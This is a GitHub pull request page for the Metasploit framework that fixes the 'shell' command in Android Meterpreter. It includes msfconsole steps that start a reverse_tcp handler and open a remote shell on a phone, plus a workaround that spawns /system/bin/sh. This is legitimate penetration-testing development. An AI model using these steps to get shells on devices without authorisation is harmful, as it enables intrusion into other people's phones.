Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

fix #11975, fix meterpreter shell command on android #11976

Merged
merged 1 commit into from Jun 29, 2019

Conversation

Projects
None yet
9 participants
@timwr
Copy link
Contributor

commented Jun 13, 2019

This was due to 53557cc#diff-b140b9ed40fbd717d5786d0ee125c7efL327

Steps to reproduce

  1. I am using metasploit-framework 5.0.28-dev and the reverse_tcp payload
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 7080
    exploit -j -z

  2. Asap Meterpreter session has been established I execute command "shell" and get following error
    Before fix:
    meterpreter > shell
    [-] stdapi_sys_config_getenv: Operation failed: 1

After fix:

meterpreter > shell
Process 1 created.
Channel 1 created.
echo lol
lol

Thoughts:

  1. I will also implement the getenv command on Android, but the extra call seems unnecessary given we know it will always be /system/bin/sh.
  2. I wonder if we can have a pty shell somehow
  3. Do we think it's worth removing (or moving to verbose) the Process 1 created, Channel 1 created. logs?
@s-straub

This comment has been minimized.

Copy link

commented on 3338401 Jun 15, 2019

I applied the code change and I works as expected.

This comment has been minimized.

Copy link

replied Jun 17, 2019

It works, thanks.

This comment has been minimized.

Copy link

replied Jun 20, 2019

Hey Bro, i applied the code change and not work the shell command, why?

This comment has been minimized.

Copy link

replied Jun 22, 2019

How do I go about changing the code please?

This comment has been minimized.

Copy link

replied Jun 24, 2019

I have the same problem but even after following the steps it still gives me the error please help me!

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Jun 22, 2019

Merge please :trollface:

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Jun 23, 2019

You can use meterpreter > execute -f /system/bin/sh -i -c as a workaround for now

@sempervictus

This comment has been minimized.

Copy link
Contributor

commented Jun 23, 2019

ping @busterb - manually requesting a merge, few of us have tested, doesn't seem to break universe, does work.

@busterb busterb self-assigned this Jun 29, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

Works for me, makes sense.

@busterb busterb merged commit 3338401 into rapid7:master Jun 29, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Jun 29, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Jun 29, 2019

Release Notes

This fixes the shell command on Android Meterpreter to explicitly use the correct path to the shell binary.

msjenkins-r7 added a commit that referenced this pull request Jun 29, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.